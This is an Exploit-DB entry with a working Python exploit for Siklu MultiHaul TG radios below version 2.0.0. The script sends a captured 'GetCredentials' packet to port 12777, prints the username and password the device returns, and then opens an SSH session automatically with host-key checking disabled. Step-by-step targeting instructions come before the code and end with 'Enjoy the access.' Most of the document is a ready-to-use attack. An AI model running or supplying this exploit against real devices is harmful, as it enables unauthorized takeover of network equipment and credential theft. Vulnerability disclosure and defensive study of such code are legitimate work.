Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure

EDB-ID:

51932

CVE:

N/A


Author:

semaja2

Type:

remote


Platform:

Hardware

Date:

2024-03-28


# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access



import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()
output = "".join(map(chr, data))

# Split output, then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))